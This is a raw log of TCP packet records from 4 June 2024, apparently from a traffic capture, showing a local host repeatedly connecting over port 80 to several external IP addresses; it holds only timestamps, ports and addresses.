                                        Jun 4, 2024 14:36:11.395112038 CEST804981923.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:11.395222902 CEST804981923.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:11.395298004 CEST4981980192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:36:11.395317078 CEST804981923.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:11.395459890 CEST4981980192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:36:11.395459890 CEST4981980192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:36:11.396996021 CEST804981923.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:11.397094965 CEST804981923.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:11.397106886 CEST804981923.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:11.397130966 CEST804981923.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:11.397139072 CEST804981923.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:11.397160053 CEST4981980192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:36:11.397331953 CEST4981980192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:36:11.397331953 CEST4981980192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:36:11.397331953 CEST4981980192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:36:11.412358999 CEST804981923.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:11.412442923 CEST804981923.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:11.412591934 CEST804981923.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:11.412600994 CEST804981923.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:11.412806988 CEST4981980192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:36:11.412806988 CEST4981980192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:36:11.412950993 CEST4981980192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:36:11.412950993 CEST4981980192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:36:11.416299105 CEST804981923.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:11.416378021 CEST804981923.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:11.416430950 CEST804981923.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:11.416440964 CEST804981923.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:11.416495085 CEST4981980192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:36:11.416619062 CEST4981980192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:36:11.416619062 CEST4981980192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:36:11.416619062 CEST4981980192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:36:11.417047024 CEST804981923.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:11.417210102 CEST4981980192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:36:11.420032978 CEST804981923.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:11.420140028 CEST4981980192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:36:11.420357943 CEST804981923.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:11.420537949 CEST4981980192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:36:11.508650064 CEST804981923.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:11.508753061 CEST804981923.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:11.508831024 CEST4981980192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:36:11.509021044 CEST4981980192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:36:11.513106108 CEST804981923.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:11.513117075 CEST804981923.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:11.513262033 CEST4981980192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:36:11.513262033 CEST4981980192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:36:11.626024008 CEST804981923.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:11.626218081 CEST4981980192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:36:12.625289917 CEST4981980192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:36:13.643255949 CEST4982080192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:36:13.773367882 CEST804982023.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:13.773550987 CEST4982080192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:36:13.775433064 CEST4982080192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:36:13.905427933 CEST804982023.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:14.020210981 CEST804982023.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:14.020225048 CEST804982023.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:14.020258904 CEST804982023.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:14.020270109 CEST804982023.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:14.020427942 CEST4982080192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:36:14.025161982 CEST804982023.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:14.025274992 CEST804982023.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:14.025302887 CEST804982023.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:14.025360107 CEST804982023.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:14.025547028 CEST4982080192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:36:14.025547028 CEST4982080192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:36:14.029934883 CEST804982023.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:14.030011892 CEST804982023.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:14.030025005 CEST804982023.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:14.030119896 CEST804982023.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:14.030282974 CEST4982080192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:36:14.030282974 CEST4982080192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:36:14.033552885 CEST804982023.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:14.049653053 CEST804982023.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:14.049787998 CEST804982023.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:14.049799919 CEST804982023.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:14.049808979 CEST804982023.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:14.049814939 CEST4982080192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:36:14.050069094 CEST4982080192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:36:14.050491095 CEST804982023.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:14.050687075 CEST4982080192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:36:14.053751945 CEST804982023.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:14.053865910 CEST804982023.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:14.053878069 CEST804982023.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:14.053886890 CEST804982023.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:14.054124117 CEST4982080192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:36:14.054125071 CEST4982080192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:36:14.054471016 CEST804982023.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:14.057079077 CEST804982023.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:14.057195902 CEST804982023.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:14.057209015 CEST804982023.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:14.057218075 CEST804982023.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:14.057240963 CEST4982080192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:36:14.057461023 CEST4982080192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:36:14.061774015 CEST804982023.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:14.061887980 CEST804982023.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:14.061899900 CEST804982023.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:14.061908007 CEST804982023.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:14.061985970 CEST4982080192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:36:14.062129974 CEST4982080192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:36:14.067476034 CEST804982023.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:14.067572117 CEST804982023.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:14.067583084 CEST804982023.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:14.067594051 CEST804982023.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:14.067828894 CEST4982080192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:36:14.067828894 CEST4982080192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:36:14.067868948 CEST804982023.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:14.067955971 CEST804982023.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:14.068037987 CEST804982023.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:14.068146944 CEST4982080192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:36:14.068234921 CEST4982080192.168.11.3023.227.38.74
                                        Jun 4, 2024 14:36:14.073473930 CEST804982023.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:14.073579073 CEST804982023.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:14.073590994 CEST804982023.227.38.74192.168.11.30
                                        Jun 4, 2024 14:36:14.073599100 CEST804982023.227.38.74192.168.11.30
                                        Jun 4, 2024 14:37:59.491780996 CEST4984580192.168.11.30192.207.62.21
                                        Jun 4, 2024 14:38:00.510143995 CEST4984680192.168.11.30192.207.62.21
                                        Jun 4, 2024 14:38:00.677140951 CEST8049846192.207.62.21192.168.11.30
                                        Jun 4, 2024 14:38:00.677305937 CEST4984680192.168.11.30192.207.62.21
                                        Jun 4, 2024 14:38:00.679064989 CEST4984680192.168.11.30192.207.62.21
                                        Jun 4, 2024 14:38:00.846048117 CEST8049846192.207.62.21192.168.11.30
                                        Jun 4, 2024 14:38:00.849019051 CEST8049846192.207.62.21192.168.11.30
                                        Jun 4, 2024 14:38:00.849031925 CEST8049846192.207.62.21192.168.11.30
                                        Jun 4, 2024 14:38:00.849209070 CEST8049846192.207.62.21192.168.11.30
                                        Jun 4, 2024 14:38:00.849379063 CEST4984680192.168.11.30192.207.62.21
                                        Jun 4, 2024 14:38:00.849379063 CEST4984680192.168.11.30192.207.62.21
                                        Jun 4, 2024 14:38:00.853908062 CEST4984680192.168.11.30192.207.62.21
                                        Jun 4, 2024 14:38:01.020975113 CEST8049846192.207.62.21192.168.11.30
                                        Jun 4, 2024 14:38:08.917093039 CEST4984780192.168.11.3091.195.240.19
                                        Jun 4, 2024 14:38:09.143685102 CEST804984791.195.240.19192.168.11.30
                                        Jun 4, 2024 14:38:09.143940926 CEST4984780192.168.11.3091.195.240.19
                                        Jun 4, 2024 14:38:09.145692110 CEST4984780192.168.11.3091.195.240.19
                                        Jun 4, 2024 14:38:09.372328997 CEST804984791.195.240.19192.168.11.30
                                        Jun 4, 2024 14:38:09.372344017 CEST804984791.195.240.19192.168.11.30
                                        Jun 4, 2024 14:38:09.372797012 CEST4984780192.168.11.3091.195.240.19
                                        Jun 4, 2024 14:38:09.375189066 CEST4984780192.168.11.3091.195.240.19
                                        Jun 4, 2024 14:38:09.601699114 CEST804984791.195.240.19192.168.11.30
                                        Jun 4, 2024 14:38:14.382070065 CEST4984880192.168.11.3034.120.137.41
                                        Jun 4, 2024 14:38:14.499720097 CEST804984834.120.137.41192.168.11.30
                                        Jun 4, 2024 14:38:14.499948978 CEST4984880192.168.11.3034.120.137.41
                                        Jun 4, 2024 14:38:14.501797915 CEST4984880192.168.11.3034.120.137.41
                                        Jun 4, 2024 14:38:14.619445086 CEST804984834.120.137.41192.168.11.30
                                        Jun 4, 2024 14:38:14.649626017 CEST804984834.120.137.41192.168.11.30
                                        Jun 4, 2024 14:38:14.649689913 CEST804984834.120.137.41192.168.11.30
                                        Jun 4, 2024 14:38:14.649920940 CEST4984880192.168.11.3034.120.137.41
                                        Jun 4, 2024 14:38:16.003638983 CEST4984880192.168.11.3034.120.137.41
                                        Jun 4, 2024 14:38:17.022265911 CEST4984980192.168.11.3034.120.137.41
                                        Jun 4, 2024 14:38:17.139828920 CEST804984934.120.137.41192.168.11.30
                                        Jun 4, 2024 14:38:17.139997005 CEST4984980192.168.11.3034.120.137.41
                                        Jun 4, 2024 14:38:17.141961098 CEST4984980192.168.11.3034.120.137.41
                                        Jun 4, 2024 14:38:17.259681940 CEST804984934.120.137.41192.168.11.30
                                        Jun 4, 2024 14:38:17.288959980 CEST804984934.120.137.41192.168.11.30
                                        Jun 4, 2024 14:38:17.289041042 CEST804984934.120.137.41192.168.11.30
                                        Jun 4, 2024 14:38:17.289196014 CEST4984980192.168.11.3034.120.137.41
                                        Jun 4, 2024 14:38:18.643667936 CEST4984980192.168.11.3034.120.137.41
                                        Jun 4, 2024 14:38:19.661704063 CEST4985080192.168.11.3034.120.137.41
                                        Jun 4, 2024 14:38:19.779489040 CEST804985034.120.137.41192.168.11.30
                                        Jun 4, 2024 14:38:19.779804945 CEST4985080192.168.11.3034.120.137.41
                                        Jun 4, 2024 14:38:19.781563997 CEST4985080192.168.11.3034.120.137.41
                                        Jun 4, 2024 14:38:19.899508953 CEST804985034.120.137.41192.168.11.30
                                        Jun 4, 2024 14:38:19.899519920 CEST804985034.120.137.41192.168.11.30
                                        Jun 4, 2024 14:38:19.925964117 CEST804985034.120.137.41192.168.11.30
                                        Jun 4, 2024 14:38:19.926084042 CEST804985034.120.137.41192.168.11.30
                                        Jun 4, 2024 14:38:19.926245928 CEST4985080192.168.11.3034.120.137.41
                                        Jun 4, 2024 14:38:21.283724070 CEST4985080192.168.11.3034.120.137.41
                                        Jun 4, 2024 14:38:22.301949024 CEST4985180192.168.11.3034.120.137.41
                                        Jun 4, 2024 14:38:22.419727087 CEST804985134.120.137.41192.168.11.30
                                        Jun 4, 2024 14:38:22.420047998 CEST4985180192.168.11.3034.120.137.41
                                        Jun 4, 2024 14:38:22.421736956 CEST4985180192.168.11.3034.120.137.41
                                        Jun 4, 2024 14:38:22.539385080 CEST804985134.120.137.41192.168.11.30
                                        Jun 4, 2024 14:38:22.571403980 CEST804985134.120.137.41192.168.11.30
                                        Jun 4, 2024 14:38:22.571521044 CEST804985134.120.137.41192.168.11.30
                                        Jun 4, 2024 14:38:22.571747065 CEST4985180192.168.11.3034.120.137.41
                                        Jun 4, 2024 14:38:22.574265003 CEST4985180192.168.11.3034.120.137.41
                                        Jun 4, 2024 14:38:22.692101002 CEST804985134.120.137.41192.168.11.30
                                        Jun 4, 2024 14:38:27.582269907 CEST4985280192.168.11.30160.124.114.188
                                        Jun 4, 2024 14:38:27.915441990 CEST8049852160.124.114.188192.168.11.30
                                        Jun 4, 2024 14:38:27.915740013 CEST4985280192.168.11.30160.124.114.188
                                        Jun 4, 2024 14:38:27.917610884 CEST4985280192.168.11.30160.124.114.188
                                        Jun 4, 2024 14:38:28.260107040 CEST8049852160.124.114.188192.168.11.30
                                        Jun 4, 2024 14:38:28.261450052 CEST8049852160.124.114.188192.168.11.30
                                        Jun 4, 2024 14:38:28.261461973 CEST8049852160.124.114.188192.168.11.30
                                        Jun 4, 2024 14:38:28.261718988 CEST4985280192.168.11.30160.124.114.188
                                        Jun 4, 2024 14:38:29.422506094 CEST4985280192.168.11.30160.124.114.188
                                        Jun 4, 2024 14:38:30.440915108 CEST4985380192.168.11.30160.124.114.188
                                        Jun 4, 2024 14:38:30.753022909 CEST8049853160.124.114.188192.168.11.30
                                        Jun 4, 2024 14:38:30.753236055 CEST4985380192.168.11.30160.124.114.188
                                        Jun 4, 2024 14:38:30.755244017 CEST4985380192.168.11.30160.124.114.188
                                        Jun 4, 2024 14:38:31.067385912 CEST8049853160.124.114.188192.168.11.30
                                        Jun 4, 2024 14:38:31.068583965 CEST8049853160.124.114.188192.168.11.30
                                        Jun 4, 2024 14:38:31.068597078 CEST8049853160.124.114.188192.168.11.30
                                        Jun 4, 2024 14:38:31.068783998 CEST4985380192.168.11.30160.124.114.188
                                        Jun 4, 2024 14:38:32.265624046 CEST4985380192.168.11.30160.124.114.188
                                        Jun 4, 2024 14:38:33.284332037 CEST4985480192.168.11.30160.124.114.188
                                        Jun 4, 2024 14:38:33.593512058 CEST8049854160.124.114.188192.168.11.30
                                        Jun 4, 2024 14:38:33.593759060 CEST4985480192.168.11.30160.124.114.188
                                        Jun 4, 2024 14:38:33.595810890 CEST4985480192.168.11.30160.124.114.188
                                        Jun 4, 2024 14:38:33.904973030 CEST8049854160.124.114.188192.168.11.30
                                        Jun 4, 2024 14:38:33.906240940 CEST8049854160.124.114.188192.168.11.30
                                        Jun 4, 2024 14:38:33.906253099 CEST8049854160.124.114.188192.168.11.30
                                        Jun 4, 2024 14:38:33.906621933 CEST4985480192.168.11.30160.124.114.188
                                        Jun 4, 2024 14:38:35.108695030 CEST4985480192.168.11.30160.124.114.188
                                        Jun 4, 2024 14:38:36.127343893 CEST4985580192.168.11.30160.124.114.188
                                        Jun 4, 2024 14:38:36.476332903 CEST8049855160.124.114.188192.168.11.30
                                        Jun 4, 2024 14:38:36.476607084 CEST4985580192.168.11.30160.124.114.188
                                        Jun 4, 2024 14:38:36.478188992 CEST4985580192.168.11.30160.124.114.188
                                        Jun 4, 2024 14:38:36.796966076 CEST8049855160.124.114.188192.168.11.30
                                        Jun 4, 2024 14:38:36.798222065 CEST8049855160.124.114.188192.168.11.30
                                        Jun 4, 2024 14:38:36.798343897 CEST8049855160.124.114.188192.168.11.30
                                        Jun 4, 2024 14:38:36.798599005 CEST4985580192.168.11.30160.124.114.188
                                        Jun 4, 2024 14:38:36.801328897 CEST4985580192.168.11.30160.124.114.188
                                        Jun 4, 2024 14:38:37.122946978 CEST8049855160.124.114.188192.168.11.30
                                        Jun 4, 2024 14:38:41.812889099 CEST4985680192.168.11.3091.195.240.19
                                        Jun 4, 2024 14:38:42.039410114 CEST804985691.195.240.19192.168.11.30
                                        Jun 4, 2024 14:38:42.039585114 CEST4985680192.168.11.3091.195.240.19
                                        Jun 4, 2024 14:38:42.041404009 CEST4985680192.168.11.3091.195.240.19
                                        Jun 4, 2024 14:38:42.268013000 CEST804985691.195.240.19192.168.11.30
                                        Jun 4, 2024 14:38:42.268026114 CEST804985691.195.240.19192.168.11.30
                                        Jun 4, 2024 14:38:42.268244028 CEST4985680192.168.11.3091.195.240.19
                                        Jun 4, 2024 14:38:43.544311047 CEST4985680192.168.11.3091.195.240.19
                                        Jun 4, 2024 14:38:44.562589884 CEST4985780192.168.11.3091.195.240.19
                                        Jun 4, 2024 14:38:44.787143946 CEST804985791.195.240.19192.168.11.30
                                        Jun 4, 2024 14:38:44.787303925 CEST4985780192.168.11.3091.195.240.19
                                        Jun 4, 2024 14:38:44.789134979 CEST4985780192.168.11.3091.195.240.19
                                        Jun 4, 2024 14:38:45.014115095 CEST804985791.195.240.19192.168.11.30
                                        Jun 4, 2024 14:38:45.014127970 CEST804985791.195.240.19192.168.11.30
                                        Jun 4, 2024 14:38:45.014266968 CEST4985780192.168.11.3091.195.240.19
                                        Jun 4, 2024 14:38:46.293684959 CEST4985780192.168.11.3091.195.240.19
                                        Jun 4, 2024 14:38:47.311956882 CEST4985880192.168.11.3091.195.240.19
                                        Jun 4, 2024 14:38:47.540479898 CEST804985891.195.240.19192.168.11.30
                                        Jun 4, 2024 14:38:47.540690899 CEST4985880192.168.11.3091.195.240.19
                                        Jun 4, 2024 14:38:47.542704105 CEST4985880192.168.11.3091.195.240.19
                                        Jun 4, 2024 14:38:47.771480083 CEST804985891.195.240.19192.168.11.30
                                        Jun 4, 2024 14:38:47.771619081 CEST804985891.195.240.19192.168.11.30
                                        Jun 4, 2024 14:38:47.771631002 CEST804985891.195.240.19192.168.11.30
                                        Jun 4, 2024 14:38:47.771760941 CEST4985880192.168.11.3091.195.240.19
                                        Jun 4, 2024 14:38:49.058872938 CEST4985880192.168.11.3091.195.240.19
                                        Jun 4, 2024 14:38:50.076989889 CEST4985980192.168.11.3091.195.240.19
                                        Jun 4, 2024 14:38:50.303999901 CEST804985991.195.240.19192.168.11.30
                                        Jun 4, 2024 14:38:50.304234028 CEST4985980192.168.11.3091.195.240.19
                                        Jun 4, 2024 14:38:50.305811882 CEST4985980192.168.11.3091.195.240.19
                                        Jun 4, 2024 14:38:50.532887936 CEST804985991.195.240.19192.168.11.30
                                        Jun 4, 2024 14:38:50.532901049 CEST804985991.195.240.19192.168.11.30
                                        Jun 4, 2024 14:38:50.533199072 CEST4985980192.168.11.3091.195.240.19
                                        Jun 4, 2024 14:38:50.535749912 CEST4985980192.168.11.3091.195.240.19
                                        Jun 4, 2024 14:38:50.762608051 CEST804985991.195.240.19192.168.11.30
                                        Jun 4, 2024 14:38:55.544389009 CEST4986080192.168.11.30172.67.205.56
                                        Jun 4, 2024 14:38:55.662069082 CEST8049860172.67.205.56192.168.11.30
                                        Jun 4, 2024 14:38:55.662368059 CEST4986080192.168.11.30172.67.205.56
                                        Jun 4, 2024 14:38:55.664139986 CEST4986080192.168.11.30172.67.205.56
                                        Jun 4, 2024 14:38:55.781642914 CEST8049860172.67.205.56192.168.11.30
                                        Jun 4, 2024 14:38:55.853091955 CEST8049860172.67.205.56192.168.11.30
                                        Jun 4, 2024 14:38:55.853205919 CEST8049860172.67.205.56192.168.11.30
                                        Jun 4, 2024 14:38:55.853353024 CEST4986080192.168.11.30172.67.205.56
                                        Jun 4, 2024 14:38:55.854499102 CEST8049860172.67.205.56192.168.11.30
                                        Jun 4, 2024 14:38:55.854688883 CEST4986080192.168.11.30172.67.205.56
                                        Jun 4, 2024 14:38:57.166249990 CEST4986080192.168.11.30172.67.205.56
                                        Jun 4, 2024 14:38:58.184721947 CEST4986180192.168.11.30172.67.205.56
                                        Jun 4, 2024 14:38:58.315217018 CEST8049861172.67.205.56192.168.11.30
                                        Jun 4, 2024 14:38:58.315418005 CEST4986180192.168.11.30172.67.205.56
                                        Jun 4, 2024 14:38:58.317362070 CEST4986180192.168.11.30172.67.205.56
                                        Jun 4, 2024 14:38:58.447762012 CEST8049861172.67.205.56192.168.11.30
                                        Jun 4, 2024 14:38:58.581917048 CEST8049861172.67.205.56192.168.11.30
                                        Jun 4, 2024 14:38:58.581938982 CEST8049861172.67.205.56192.168.11.30
                                        Jun 4, 2024 14:38:58.582168102 CEST4986180192.168.11.30172.67.205.56
                                        Jun 4, 2024 14:38:58.582370996 CEST8049861172.67.205.56192.168.11.30
                                        Jun 4, 2024 14:38:58.582499027 CEST4986180192.168.11.30172.67.205.56
                                        Jun 4, 2024 14:38:59.821907043 CEST4986180192.168.11.30172.67.205.56
                                        Jun 4, 2024 14:39:00.840033054 CEST4986280192.168.11.30172.67.205.56
                                        Jun 4, 2024 14:39:00.975177050 CEST8049862172.67.205.56192.168.11.30
                                        Jun 4, 2024 14:39:00.975373030 CEST4986280192.168.11.30172.67.205.56
                                        Jun 4, 2024 14:39:00.977001905 CEST4986280192.168.11.30172.67.205.56
                                        Jun 4, 2024 14:39:01.112159967 CEST8049862172.67.205.56192.168.11.30
                                        Jun 4, 2024 14:39:01.112190962 CEST8049862172.67.205.56192.168.11.30
                                        Jun 4, 2024 14:39:01.189018011 CEST8049862172.67.205.56192.168.11.30
                                        Jun 4, 2024 14:39:01.189029932 CEST8049862172.67.205.56192.168.11.30
                                        Jun 4, 2024 14:39:01.189203024 CEST4986280192.168.11.30172.67.205.56
                                        Jun 4, 2024 14:39:01.189870119 CEST8049862172.67.205.56192.168.11.30
                                        Jun 4, 2024 14:39:01.190015078 CEST4986280192.168.11.30172.67.205.56
                                        Jun 4, 2024 14:39:02.493204117 CEST4986280192.168.11.30172.67.205.56
                                        Jun 4, 2024 14:39:03.511084080 CEST4986380192.168.11.30172.67.205.56
                                        Jun 4, 2024 14:39:03.628321886 CEST8049863172.67.205.56192.168.11.30
                                        Jun 4, 2024 14:39:03.628460884 CEST4986380192.168.11.30172.67.205.56
                                        Jun 4, 2024 14:39:03.630337954 CEST4986380192.168.11.30172.67.205.56
                                        Jun 4, 2024 14:39:03.747550011 CEST8049863172.67.205.56192.168.11.30
                                        Jun 4, 2024 14:39:03.812156916 CEST8049863172.67.205.56192.168.11.30
                                        Jun 4, 2024 14:39:03.812179089 CEST8049863172.67.205.56192.168.11.30
                                        Jun 4, 2024 14:39:03.812442064 CEST8049863172.67.205.56192.168.11.30
                                        Jun 4, 2024 14:39:03.812505007 CEST4986380192.168.11.30172.67.205.56
                                        Jun 4, 2024 14:39:03.812563896 CEST4986380192.168.11.30172.67.205.56
                                        Jun 4, 2024 14:39:03.816273928 CEST4986380192.168.11.30172.67.205.56
                                        Jun 4, 2024 14:39:03.933356047 CEST8049863172.67.205.56192.168.11.30
                                        Jun 4, 2024 14:39:08.822930098 CEST4986480192.168.11.30162.0.237.22
                                        Jun 4, 2024 14:39:08.992937088 CEST8049864162.0.237.22192.168.11.30
                                        Jun 4, 2024 14:39:08.993136883 CEST4986480192.168.11.30162.0.237.22
                                        Jun 4, 2024 14:39:08.995440960 CEST4986480192.168.11.30162.0.237.22
                                        Jun 4, 2024 14:39:09.163378954 CEST8049864162.0.237.22192.168.11.30
                                        Jun 4, 2024 14:39:09.173477888 CEST8049864162.0.237.22192.168.11.30
                                        Jun 4, 2024 14:39:09.173500061 CEST8049864162.0.237.22192.168.11.30
                                        Jun 4, 2024 14:39:09.173672915 CEST4986480192.168.11.30162.0.237.22
                                        Jun 4, 2024 14:39:10.507011890 CEST4986480192.168.11.30162.0.237.22
                                        Jun 4, 2024 14:39:11.525823116 CEST4986580192.168.11.30162.0.237.22
                                        Jun 4, 2024 14:39:11.706942081 CEST8049865162.0.237.22192.168.11.30
                                        Jun 4, 2024 14:39:11.707159042 CEST4986580192.168.11.30162.0.237.22
                                        Jun 4, 2024 14:39:11.709048986 CEST4986580192.168.11.30162.0.237.22
                                        Jun 4, 2024 14:39:11.891921043 CEST8049865162.0.237.22192.168.11.30
                                        Jun 4, 2024 14:39:11.910677910 CEST8049865162.0.237.22192.168.11.30
                                        Jun 4, 2024 14:39:11.910733938 CEST8049865162.0.237.22192.168.11.30
                                        Jun 4, 2024 14:39:11.910867929 CEST4986580192.168.11.30162.0.237.22
                                        Jun 4, 2024 14:39:13.225112915 CEST4986580192.168.11.30162.0.237.22
                                        Jun 4, 2024 14:39:14.243331909 CEST4986680192.168.11.30162.0.237.22
                                        Jun 4, 2024 14:39:14.415451050 CEST8049866162.0.237.22192.168.11.30
                                        Jun 4, 2024 14:39:14.415651083 CEST4986680192.168.11.30162.0.237.22
                                        Jun 4, 2024 14:39:14.417556047 CEST4986680192.168.11.30162.0.237.22
                                        Jun 4, 2024 14:39:14.597273111 CEST8049866162.0.237.22192.168.11.30
                                        Jun 4, 2024 14:39:14.609250069 CEST8049866162.0.237.22192.168.11.30
                                        Jun 4, 2024 14:39:14.609267950 CEST8049866162.0.237.22192.168.11.30
                                        Jun 4, 2024 14:39:14.609380007 CEST4986680192.168.11.30162.0.237.22
                                        Jun 4, 2024 14:39:15.927669048 CEST4986680192.168.11.30162.0.237.22
                                        Jun 4, 2024 14:39:16.945769072 CEST4986780192.168.11.30162.0.237.22
                                        Jun 4, 2024 14:39:17.113894939 CEST8049867162.0.237.22192.168.11.30
                                        Jun 4, 2024 14:39:17.114072084 CEST4986780192.168.11.30162.0.237.22
                                        Jun 4, 2024 14:39:17.115878105 CEST4986780192.168.11.30162.0.237.22
                                        Jun 4, 2024 14:39:17.288316011 CEST8049867162.0.237.22192.168.11.30
                                        Jun 4, 2024 14:39:17.297362089 CEST8049867162.0.237.22192.168.11.30
                                        Jun 4, 2024 14:39:17.297439098 CEST8049867162.0.237.22192.168.11.30
                                        Jun 4, 2024 14:39:17.297667027 CEST4986780192.168.11.30162.0.237.22
                                        Jun 4, 2024 14:39:17.299918890 CEST4986780192.168.11.30162.0.237.22
                                        Jun 4, 2024 14:39:17.477317095 CEST8049867162.0.237.22192.168.11.30
                                        Jun 4, 2024 14:39:22.303935051 CEST4986880192.168.11.3064.190.62.22
                                        Jun 4, 2024 14:39:22.528212070 CEST804986864.190.62.22192.168.11.30
                                        Jun 4, 2024 14:39:22.528496981 CEST4986880192.168.11.3064.190.62.22
                                        Jun 4, 2024 14:39:22.530529022 CEST4986880192.168.11.3064.190.62.22
                                        Jun 4, 2024 14:39:22.755132914 CEST804986864.190.62.22192.168.11.30
                                        Jun 4, 2024 14:39:22.755146980 CEST804986864.190.62.22192.168.11.30
                                        Jun 4, 2024 14:39:22.755445004 CEST4986880192.168.11.3064.190.62.22
                                        Jun 4, 2024 14:39:24.035192013 CEST4986880192.168.11.3064.190.62.22
                                        Jun 4, 2024 14:39:25.053425074 CEST4986980192.168.11.3064.190.62.22
                                        Jun 4, 2024 14:39:25.278320074 CEST804986964.190.62.22192.168.11.30
                                        Jun 4, 2024 14:39:25.278573990 CEST4986980192.168.11.3064.190.62.22
                                        Jun 4, 2024 14:39:25.280807018 CEST4986980192.168.11.3064.190.62.22
                                        Jun 4, 2024 14:39:25.506483078 CEST804986964.190.62.22192.168.11.30
                                        Jun 4, 2024 14:39:25.506510973 CEST804986964.190.62.22192.168.11.30
                                        Jun 4, 2024 14:39:25.506650925 CEST4986980192.168.11.3064.190.62.22
                                        Jun 4, 2024 14:39:26.784590006 CEST4986980192.168.11.3064.190.62.22
